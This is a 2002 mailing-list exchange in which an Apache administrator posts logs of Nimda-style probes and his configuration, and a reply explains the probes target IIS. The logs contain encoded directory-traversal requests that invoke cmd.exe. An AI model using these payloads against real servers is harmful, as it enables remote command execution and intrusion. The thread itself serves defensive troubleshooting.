[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Bizarre apache logs

Looks like part of the Nimda virus that's rampant. It's looking for exploitable 
holes in IIS. Since you're running apache, I don't believe you have much to 
worry about.

There are some apache modules out there that you can install, that will take the 
IP address from your log when it sees things like this, do an ARIN lookup on it, 
and send an email to abuse and hostmaster of the company that owns that block. 


On Sun, 6 Oct 2002, Marcel Weber wrote:

> Hi
> 
> I had some bizarre 404 entries in my apache logs. They are very rare, but it
> looks as they resulted from an attempted attack. Well say it was a rather
> lame attack, but I wonder where the 404 and 400 came from. As the server is
> configured, there should be only 403 answers, as the whole http part is
> closed. Except for one directory and from the intranet. From the outside one
> can access the server via https only.
> 
> I don't know if I have to be alerted or something, but I would feel better
> if someone could check my set up. Just for making sure, that it is not a
> misconfiguration. The server is an older Compaq Proliant 800, some Pentium
> 133 MHz. Rather slow, perhaps this has an influence.
> 
> Below are the error.log and access.log in question an at the end the
> relevant section of the httpd.conf.
> 
> Regards
> 
> Marcel
> 
> 
> ############################################################################
> ###
> access.log: I put some newlines between the 404 an the rest of it.
> 
> 80.240.96.146 - - [29/Sep/2002:12:50:03 +0200] "GET /scripts/root.exe?/c+dir
> HTT
> P/1.0" 403 286 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET /MSADC/root.exe?/c+dir
> HTTP/
> 1.0" 403 284 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET
> /c/winnt/system32/cmd.exe?/c
> +dir HTTP/1.0" 403 294 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET
> /d/winnt/system32/cmd.exe?/c
> +dir HTTP/1.0" 403 294 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET
> /scripts/..%255c../winnt/sys
> tem32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET
> /_vti_bin/..%255c../..%255c.
> ./..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET
> /_mem_bin/..%255c../..%255c.
> ./..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET
> /msadc/..%255c../..%255c../.
> .%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0"
> 403 341 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET
> /scripts/..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
> 
> 
> 80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET
> /scripts/..%c0%2f../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 
> 
> 80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET
> /scripts/..%c0%af../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET
> /scripts/..%c1%9c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET
> /scripts/..%%35%63../winnt/s
> ystem32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET
> /scripts/..%%35c../winnt/sys
> tem32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET
> /scripts/..%25%35%63../winnt
> /system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
> 80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET
> /scripts/..%252f../winnt/sys
> tem32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
> 
> ###########################################################################
> In the error.log there are following entries:
> 
> [Sun Sep 29 12:50:03 2002] [error] [client 80.240.96.146] client denied by
> serve
> r configuration: /var/www/scripts
> [Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by
> serve
> r configuration: /var/www/MSADC
> [Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by
> serve
> r configuration: /var/www/c
> [Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by
> serve
> r configuration: /var/www/d
> [Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by
> serve
> r configuration: /var/www/scripts
> [Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by
> serve
> r configuration: /var/www/_vti_bin
> [Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by
> serve
> r configuration: /var/www/_mem_bin
> [Sun Sep 29 12:50:06 2002] [error] [client 80.240.96.146] client denied by
> serve
> r configuration: /var/www/msadc
> [Sun Sep 29 12:50:06 2002] [error] [client 80.240.96.146] client denied by
> serve
> r configuration: /var/www/scripts
> [Sun Sep 29 12:50:07 2002] [error] [client 80.240.96.146] client denied by
> serve
> r configuration: /var/www/scripts
> [Sun Sep 29 12:50:07 2002] [error] [client 80.240.96.146] client denied by
> serve
> r configuration: /var/www/scripts
> [Sun Sep 29 12:50:08 2002] [error] [client 80.240.96.146] client denied by
> serve
> r configuration: /var/www/scripts
> [Sun Sep 29 12:50:08 2002] [error] [client 80.240.96.146] client denied by
> serve
> r configuration: /var/www/scripts
> 
> ####################################################################3
> 
> Here comes my httpd.conf
> 
> <Location />
>        Order allow,deny
>        deny from all
> </Location>
> 
> 
> <VirtualHost _default_:80>
>         ServerName      xxx.foo.com
>         ServerAlias     xxx.faa.com
> 
> 
> <Location />
>       Order allow,deny
>       allow from 192.x.x.0/24  # allow access only from the intranet
> 
>       AuthType Basic
>       AuthName "foo"
>       AuthLDAPBindDN "xxxxxxxxxxxxxxxxxxxxxxxx"
>       AuthLDAPBindPassword "xxxxxxxxxxxxxxxxxxx"
>       AuthLDAPUrl ldap://dddddddddddddddddddddddddddddddddddddd
>       require valid-user
> 
> </Location>
> 
> <Location /public>
>         Order allow,deny
>         allow from all
>         satisfy any
> </Location>
> 
> 
>         <Location /zykadmin>
>                 Order allow,deny
>                 allow from 192.x.x.0/24
>         </Location>
> 
> 
>         <Location /servlets>
>                 Order allow,deny
>                 Allow from 192.x.x.0/24
>         </Location>
> 
>         #### Servlets welche via http zugänglich sind
>         WebAppDeploy examples warpConnection /servlets/examples/
>         WebAppDeploy lagerchargen warpConnection /servlets/agauga/
> 
> </VirtualHost>
> 
> <VirtualHost _default_:443>
>         DocumentRoot    /var/www
>         ServerName      xxx.foo.com
>         ServerAlias 	yyy.faa.com
> 
>         #### Servlets welche via https zugänglich sind
>         WebAppDeploy examples warpConnection /servlets/examples/
>         WebAppDeploy lagerchargen warpConnection /servlets/agauga/
> 
> 
>         <Location />
>                Order allow,deny
>                allow from all
> 
>                 AuthType Basic
>                 AuthName "iiiiiiiiiiiii"
>                 AuthLDAPBindDN "ooooooooooooooooooo"
>                 AuthLDAPBindPassword "xxxxxxxxxx"
>                 AuthLDAPUrl ldap://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
>                 require valid-user
> 
>         </Location>
> 
> 
>         <IfModule mod_ssl.c>
>                   SSLEngine on
>                   SSLCertificateFile    /etc/apache/ssl.crt/server.crt
>                   SSLCertificateKeyFile /etc/apache/ssl.key/server.key
> #                 SetEnvIf User-Agent ".*MSIE.*" nokeepalive
> ssl-unclean-shutdown
>         </IfModule>
> </VirtualHost>
> 
> --------------------
> 
> PGP / GPG Key:    http://www.ncpro.com/GPG/mmweber-at-ncpro-com.asc
> 
> 
> -- 
> To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
> 
>
Reply to: